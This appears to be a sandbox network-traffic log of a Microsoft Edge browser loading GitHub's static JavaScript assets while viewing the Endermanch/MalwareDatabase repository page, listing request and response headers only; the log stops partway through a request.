via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 341127
x-served-by: cache-iad-kjyo7100082-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 36, 10157
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f8de6443643e43273decc61067d61f166ec570de
content-length: 6047
-
Remote address:185.199.108.154:443RequestGET /assets/ui_packages_sudo_sudo_ts-74c0d1051bc3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 08 May 2024 16:06:07 GMT
etag: 0x8DC6F78C55D4146
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 277049
x-served-by: cache-iad-kiad7000045-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 1, 8131
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 275aa2d5d5fba9ec7f083c73682f2e83043e483f
content-length: 3450
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ui_packages_hydro-analytics_hydro-analytics_ts-82813f-2f25462cf4b0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_updatable-content_ts-ui_packages_hydro-analytics_hydro-analytics_ts-82813f-2f25462cf4b0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 08 May 2024 00:13:32 GMT
etag: 0x8DC6EF3B253CDB9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 444861
x-served-by: cache-iad-kiad7000056-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 33, 13693
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 493692f92efb89b13f8079a845e2a1bdb77bded4
content-length: 66980
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-355eb4940fad.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-355eb4940fad.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 15:39:48 GMT
etag: 0x8DC5EF49DA72D47
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 603086
x-served-by: cache-iad-kjyo7100068-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 56, 18282
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2d535f47de2595b2a9c7418e10f4ace164cc32fb
content-length: 23824
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-1390d8d5a0dc.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-1390d8d5a0dc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 16:40:30 GMT
etag: 0x8DC65466B33D8A4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1224973
x-served-by: cache-iad-kcgs7200095-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 21, 34439
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 64c93c6feaf8a2f7eb39447b3bbfcc579ca57e0c
content-length: 4804
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-2e2258-057ee3dfb92c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-2e2258-057ee3dfb92c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 11 Apr 2024 10:30:17 GMT
etag: 0x8DC5A1261D7BD8F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2072068
x-served-by: cache-iad-kcgs7200025-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 9, 46018
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7d3b788611ce5a87f0ce05e7313db8b890a664b1
content-length: 4544
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-103883687a95.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-103883687a95.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 22 Apr 2024 21:43:23 GMT
etag: 0x8DC63153BE4D358
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1750873
x-served-by: cache-iad-kcgs7200052-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 36, 46863
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4bfcfac3f35e7d16bf80fc40dbf7fff12c13b890
content-length: 3635
-
Remote address:185.199.108.154:443RequestGET /assets/behaviors-6de464341e2e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 15:39:48 GMT
etag: 0x8DC5EF49DA643EC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 603086
x-served-by: cache-iad-kjyo7100029-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 56, 18210
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d8d48df4a3ea7e301ad38f8eed3e4ee0b3c682d1
content-length: 10551
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-2ea61fcc9a71.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-2ea61fcc9a71.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 29 Feb 2024 04:42:44 GMT
etag: 0x8DC38E0DEE6316F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3584739
x-served-by: cache-iad-kjyo7100025-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 94, 17916
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 89d31ba5b1e28cdd53b1936afecbde69690fec63
content-length: 3312
-
Remote address:185.199.108.154:443RequestGET /assets/notifications-global-6d6db5144cc3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 27 Mar 2024 21:48:22 GMT
etag: 0x8DC4EA79FCC04B4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2363294
x-served-by: cache-iad-kjyo7100026-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 95, 43892
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c76db635e566366cc712b546aaf5d0dd0f5a425e
content-length: 3664
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:36 GMT
etag: 0x8DBD4BAB47FF086
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 3244592
x-served-by: cache-iad-kiad7000116-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 103, 31091
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a974e834c65cbbea97065c32f6265d94da6e37a3
content-length: 4295
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-f924cc31bbb1.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-f924cc31bbb1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 01 Apr 2024 20:14:16 GMT
etag: 0x8DC52884EA4948F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2686815
x-served-by: cache-iad-kjyo7100115-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 26, 23665
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3a1f4bfe6df00d5655c4d7acca53c2d9656b6925
content-length: 8736
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-2b432e185ab2.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_ref-selector_ts-2b432e185ab2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 22 Mar 2024 16:05:55 GMT
etag: 0x8DC4A89F4DA4C2B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2433622
x-served-by: cache-iad-kiad7000086-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 85, 31901
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a0dbe782a1c3c3380c723f824cf64f7222f2795a
content-length: 3645
-
Remote address:185.199.108.154:443RequestGET /assets/codespaces-d1c97ee1a640.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 16:40:23 GMT
etag: 0x8DC6546678E8866
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 662644
x-served-by: cache-iad-kjyo7100118-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 53, 4303
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4ae2d2f18f9803d1f4dc694a2ddac56e4a3fe815
content-length: 10835
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-1f9a80-8656545a294a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-1f9a80-8656545a294a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 10:51:15 GMT
etag: 0x8DC6515A15A7E12
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1582259
x-served-by: cache-iad-kcgs7200079-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 4, 27664
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ebb0393088a631dc5603e5f8b2d522f3ace1118e
content-length: 8052
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-9dbbd2-bc37e798adeb.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-9dbbd2-bc37e798adeb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 06 May 2024 21:23:02 GMT
etag: 0x8DC6E12B654291F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 519855
x-served-by: cache-iad-kjyo7100134-IAD, cache-lcy-eglc8600083-LCY
x-cache: MISS, HIT
x-cache-hits: 0, 8863
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6587525f2387ec0408156ae140e52248a0bebad9
content-length: 10022
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_repositories_get-repo-element_ts-c4da75162aa4.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/app_assets_modules_github_repositories_get-repo-element_ts-c4da75162aa4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 14:26:11 GMT
etag: 0x8DC5EEA545BD5ED
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 1739049
x-served-by: cache-iad-kjyo7100091-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 64, 5054
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f183d0a4f450da22f84edf0f5a6b24a15c7a90b3
content-length: 3615
-
Remote address:185.199.108.154:443RequestGET /assets/repositories-dea97b58db36.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 01 May 2024 15:58:19 GMT
etag: 0x8DC69F785251EEF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 603068
x-served-by: cache-iad-kiad7000021-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 62, 10664
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 10e245a78fb2c2e4e2d0943bebe0edb85987affd
content-length: 22474
-
Remote address:185.199.108.154:443RequestGET /assets/code-menu-67595c3a6d0c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 01 Apr 2024 17:53:30 GMT
etag: 0x8DC5274A485242C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 2693116
x-served-by: cache-iad-kjyo7100113-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 11, 25203
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 974921015ddd3382bd5959b716bf99d9578cf865
content-length: 2734
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--b964b4-60018fb56234.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--b964b4-60018fb56234.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 07 May 2024 03:23:23 GMT
etag: 0x8DC6E450D349837
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 519859
x-served-by: cache-iad-kcgs7200042-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 2, 7681
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f478927516116b232c8bf08e300318ce2aaab94b
content-length: 13045
-
Remote address:185.199.108.154:443RequestGET /assets/keyboard-shortcuts-dialog-9a5d036ad405.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
